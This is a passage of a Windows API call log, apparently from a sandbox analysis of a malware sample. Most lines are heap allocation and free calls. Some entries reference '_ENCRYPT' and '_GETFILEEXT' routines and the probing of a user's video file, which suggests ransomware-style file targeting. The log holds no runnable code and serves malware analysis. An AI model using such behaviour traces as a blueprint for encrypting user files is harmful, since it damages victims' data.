hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.369] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.369] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.369] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.369] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.369] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.370] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.370] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.370] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.370] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.370] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.371] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.371] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.371] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.371] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.371] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0x90add8 [0192.372] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.373] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0x90add8 [0192.373] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.374] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 